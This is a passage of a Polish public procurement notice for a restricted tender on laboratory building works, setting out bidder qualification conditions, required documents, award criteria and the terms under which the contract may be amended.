	instalacje pożarowe zasilania wentylatorów napowietrzających, oddymiających oraz central systemu, sygnalizacji pożaru i central zasileń i klap p.poż.
	instalacja odgromowa urządzeń wentylacji i klimatyzacji
	instalacja uziemień i ochrony przeciwporażeniowej
	miejscowe połączenia wyrównawcze
	instalacja ochrony przeciwprzepięciowej
	ochrona przeciwpożarowa

8) Zakres dodatkowych robót instalacji elektrycznych.
	wymiana rozdzielni piętrowych w korytarzu
	wymiana instalacji zasilania dla ww. rozdzielni piętrowych
	wymiana oświetlenia w części korytarza, roboty towarzyszące
	pomiary odbiorcze

9) Zakres dygestoriów wyciągowych
	dostawa i montaż dygestoriów wyciągowych laboratoryjnych

Szczegółowy opis przedmiotu zamówienia - załącznik nr 1 do SIWZ (plik zip),  zawiera projekt budowlany, projekt wykonawczy, STWiOR, przedmiary.
Warunki realizacji zamówienia zawiera również projekt umowy - załącznik nr 7 do SIWZ. 
<br /><br /><b>II.5) Główny kod CPV: </b>45214400-4<br /><b> Dodatkowe kody CPV:</b>45262700-8,
                45453000-7,
                45331220-4,
                45331000-6,
                45310000-3,
                39714000-0,
                39180000-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/10/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Termin wykonania : od protokolarnego przekazania placu budowy do 30.10.2017 r. wraz z odbiorami końcowymi. 
Przekazanie placu budowy nastąpi nie wcześniej niż 4 maja 2017 r.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie precyzuje szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający uzna warunek za spełniony jeśli wykonawca wykaże, że:
1.	 jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 5 000 000, 00 złotych
2.	osiągnął w ostatnim roku obrotowym, a jeżeli okres prowadzenia działalności jest krótszy  za ten okres, wskaźnik bieżącej płynności finansowej CR (current ratio), liczony jako: wskaźnik bieżącej płynności  finansowej CR = (aktywa obrotowe) / (zobowiązania krótkoterminowe), który wynosił co najmniej 1,25

<br />
                Informacje dodatkowe
                Zamawiający informuje, że nie dopuszcza stosowania zaokrągleń przy obliczaniu wskaźnika CR.  <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca winien wykazać, że posiada wiedzę i doświadczenie niezbędne do wykonania zamówienia oraz dysponuje osobami zdolnymi do wykonania zamówienia.
1.	Za posiadającego niezbędną wiedzę i doświadczenie uzna się Wykonawcę, który wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, co najmniej 2 roboty budowlane, polegające na budowie/ remoncie/ przebudowie obiektu użyteczności publicznej/ przemysłowego/ usługowego posiadającego laboratoria branży chemicznej, wraz z instalacjami wentylacyjnymi, klimatyzacyjnymi, , sanitarnymi, elektrycznymi zasilania i słaboprądowymi .

W przypadku składania oferty przez podmioty występujące wspólnie oraz poleganiu na zasobach podmiotów trzecich liczby robót wykonywanych przez różne podmioty nie podlegają sumowaniu.

	2. Za dysponującego osobami zdolnymi do wykonania zamówienia uzna się Wykonawcę, który dysponuje:
a)	kierownikiem budowy branży budowlanej posiadającym uprawnienia budowlane bez ograniczeń do prowadzenia robót budowlanych w specjalności konstrukcyjno-budowlanej 
b)	kierownikiem budowy branży sanitarnej posiadającym uprawnienia budowlane bez ograniczeń w zakresie instalacji i urządzeń cieplnych, wentylacyjnych ,wod-kan 
c)	kierownikiem budowy branży elektrycznej posiadającym uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych 
Osoby wymienione powyżej powinny posiadać odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2016 r., poz. 290), rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 r., poz. 1278) oraz ustawą z dnia 9 maja 2014 r. o ułatwieniu dostępu do wykonywania niektórych zawodów regulowanych (Dz. U. z 2014 r., poz. 768), albo odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów Prawa Budowlanego oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2016 r., poz. 65)<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Wykonawca na podstawie art. 26 ust. 2 f ustawy Pzp wraz z wnioskiem o dopuszczenie do udziału w postępowaniu zobowiązany jest złożyć aktualne na dzień złożenia wniosku dokumenty i oświadczenia potwierdzające brak podstaw do wykluczenia : 
1. zaświadczenie właściwego naczelnika urzędu skarbowego, potwierdzającego że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postepowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie opłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
2. zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów wymienionych w pkt 1 i 2 składa 	dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania potwierdzające, że nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że  zawarł porozumienie z właściwym organem w sprawie spłat tych należności  wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie  w całości wykonania decyzji właściwego organu
3. odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa 	dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości  wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postepowaniu
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykonawca na podstawie art. 26 ust. 2 f ustawy Pzp wraz z wnioskiem o dopuszczenie do udziału w postępowaniu zobowiązany jest złożyć aktualne na dzień złożenia wniosku dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu :
1.zobowiązanie innego podmiotu, na zasobach którego polega Wykonawca, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia  wg załącznika nr 6 do SIWZ ( jeśli dotyczy)
2. wykaz robót budowlanych z załączeniem dowodów, określających 
czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone  (na załączniku nr 4 do SIWZ), przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz, którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty 
3. wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz 
z informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami  na załączniku nr 4 do SIWZ
4. dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego
5. sprawozdanie finansowe w części dotyczącej aktywów obrotowych i zobowiązań krótkoterminowych, w przypadku gdy sporządzanie sprawozdania wymagane jest przepisami prawa kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, a jeżeli podlega ono badaniu biegłego rewidenta zgodnie z przepisami o rachunkowości, również odpowiedni z opinią o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających aktywa obrotowe i zobowiązania krótkoterminowe za ostatni rok obrotowy
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />Wykonawca na podstawie art. 26 ust. 2 f ustawy Pzp wraz z wnioskiem o dopuszczenie do udziału w postępowaniu zobowiązany jest złożyć aktualne na dzień złożenia wniosku dokumenty i oświadczenia potwierdzające spełnianie kryteriów selekcji :
1. wykaz robót budowlanych z załączeniem dowodów, określających 
czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone  (na załączniku nr 4 do SIWZ), przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz, którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty </div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. wniosek o dopuszczenie do udziału w postępowaniu (załącznik nr 2 do SIWZ)
2. oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej  wg załącznika nr 5 do SIWZ - składany w terminie do 3 dni od dnia przekazania informacji, o której mowa w art. 51 ust. 1a


</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg ograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Na etapie składania ofert będzie wymagane wniesienie wadium w wysokości                   150 000, 00 zł (słownie:  sto pięćdziesiąt tysięcy złotych ).</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  5<br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br />Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu: 5.
Zamawiający dokona oceny wg kryteriów selekcji na podstawie wykazu robót  na załączniku nr 4 do SIWZ.
Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu 
1) Jeżeli liczba Wykonawców, którzy złożyli wniosek o dopuszczenie do udziału w postępowaniu i spełniają warunki udziału w postępowaniu nie przekroczy 5, Zamawiający zaprosi do składania ofert wszystkich Wykonawców, którzy spełniają warunki udziału w postępowaniu. 
2) Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu, będzie większa niż 5, Zamawiający zaprosi do składania ofert 5 Wykonawców, którzy otrzymali najwyższą ocenę. W takim przypadku przy wyborze Wykonawców, którzy zostaną zaproszeni do składania ofert, Zamawiający będzie kierował się liczbą należycie wykonanych zamówień, o których mowa w sekcji 6.2.3.1 SIWZ  w sposób taki, że za każdą wykazaną robotę budowlaną zgodną z w/w warunkiem udziału w postępowaniu Wykonawca otrzyma 1 punkt. Ocenie podlegać będą zamówienia potwierdzone dokumentami poświadczającymi wykonanie robót zgodnie z zasadami sztuki budowlanej i należycie ukończonych. W przypadku, gdy dwóch lub więcej Wykonawców otrzyma tę samą liczbę punktów, o kolejności decydować będzie łączna wartość brutto zamówień ujętych w wykazie, w ten sposób, że wyższą lokatę otrzyma Wykonawca, który wykonał zamówienia o największej łącznej wartości brutto, a Wykonawcy, którzy wykonali zamówienia o niższych łącznych wartościach brutto, odpowiednio kolejne, niższe lokaty. W przypadku, gdy Wykonawca będzie polegał na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, Zamawiający nie będzie przyznawał punktów za zamówienia wykonane przez te podmioty. 
W przypadku, gdy Wykonawca będzie polegał na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zamawiający nie będzie przyznawał punktów za zamówienia wykonane przez te podmioty. 
W przypadku, gdy wykonawca powoła się kilkakrotnie na tę samą robotę budowlaną, z uwagi na wykonywanie jej przez kilka podmiotów wspólnie ubiegających się o udzielenie zamówienia, zamawiający przyzna za tę robotę punkty tylko jeden raz, uwzględniając ilość robót, a nie ilość wykonujących ją podmiotów.
</div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Rozszerzony okres rękojmi na roboty budowlane</td><td>20</td></tr><tr><td>Gwarancja i serwisowanie urządzeń</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Wszelkie zmiany treści umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez obie strony, pod rygorem nieważności. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 Prawa zamówień publicznych. 
2. Zamawiający przewiduje możliwość dokonania zmian umowy w stosunku do treści oferty, w szczególności: 
1) Terminu realizacji przedmiotu zamówienia w przypadkach: 
a) wystąpienia warunków atmosferycznych uniemożliwiających: prowadzenie zewnętrznych robót budowlanych zgodnie z ich technologią i warunkami technicznymi zapewniającymi właściwą jakość wykonania, przeprowadzanie prób i rozruchów urządzeń według wytycznych DTR producenta, dokonywanie odbiorów robót, w szczególności w przypadkach: temperatury powietrza poniżej 0,0o C, wiatru uniemożliwiającego pracę urządzeń, gwałtownych opadów deszczu, śniegu, gradobicia, burz z wyładowaniami atmosferycznymi, itp.  fakt ten musi być udokumentowany pisemnie oraz musi być potwierdzony przez Inspektora Nadzoru, 
b) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac, 
c) wystąpienia konieczności wykonania zamówienia dodatkowego, w rozumieniu art. 144 ust. 1 pkt 2 i 3 ustawy Prawo zamówień publicznych, którego realizacja będzie miała wpływ na termin wykonania robót objętych niniejszą umową, 
d) wstrzymania robót przez właściwe organy administracji publicznej na podstawie przepisów Prawa budowlanego, 
e) niedotrzymania przez Zamawiającego warunków umowy: opóźnienia, utrudnienia, zawieszenia robót lub przeszkodami dającymi się przypisać Zamawiającemu, 
f) konieczności wprowadzenia zmian na etapie wykonawstwa robót z przyczyn niezależnych od obu stron, 
g) następstwem wprowadzania zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia, 
h) następstwem działania organów administracji lub innych podmiotów, związanych z przekroczeniem obowiązujących terminów wydawania lub odmowy wydania decyzji, zezwoleń, uzgodnień, 
i) gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy w terminie umownym, zgodnie ze specyfikacją istotnych warunków zamówienia. 
Zaistnienie przeszkód w wykonywaniu robót powinno być potwierdzone pisemnie. 
Termin wykonania przedmiotu zamówienia ulega przesunięciu o okres wynikający z przerw lub opóźnień rozpoczęcia prac. Wykonawca nie będzie uprawniony do przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia, jeżeli konieczność dokonania zmiany została spowodowana przez jakikolwiek błąd lub opóźnienie ze strony Wykonawcy, włącznie z błędem lub opóźnionym dostarczeniem jakiegokolwiek dokumentu wynikającego z obowiązków Wykonawcy. 
2) materiałów zaoferowanych w ofercie, z powodu: 
a) niedostępności na rynku materiałów wskazanych w dokumentacji lub specyfikacji technicznej wykonania i odbioru robót spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów, 
b) pojawienia się na rynku materiałów nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiających uzyskanie lepszej jakości robót. 
Każdorazowo na taką zmianę musi wyrazić zgodę Inspektor Nadzoru. 
3) Konieczności zastosowania robót zamiennych z powodu: 
a) uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego, oraz nie będzie skutkować rozszerzeniem przedmiotu zamówienia w stosunku do przedmiotu określonego w specyfikacji istotnych warunków zamówienia oraz w ofercie Wykonawcy. 
b) aktualizacji rozwiązań i wytycznych zawartych w dokumentacji, z uwagi na postęp technologiczny, 
c) sytuacji gdy wykonanie tych robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy Jeżeli zmiana umowy wymaga zmiany dokumentacji lub specyfikacji technicznych wykonania i odbioru robót, strona inicjująca zmianę przedstawia propozycję zmian zawierającą opis proponowanych zmian, kosztorys zamienny i niezbędne rysunki. Propozycja taka wymaga zatwierdzenia do realizacji przez Inspektora Nadzoru. 
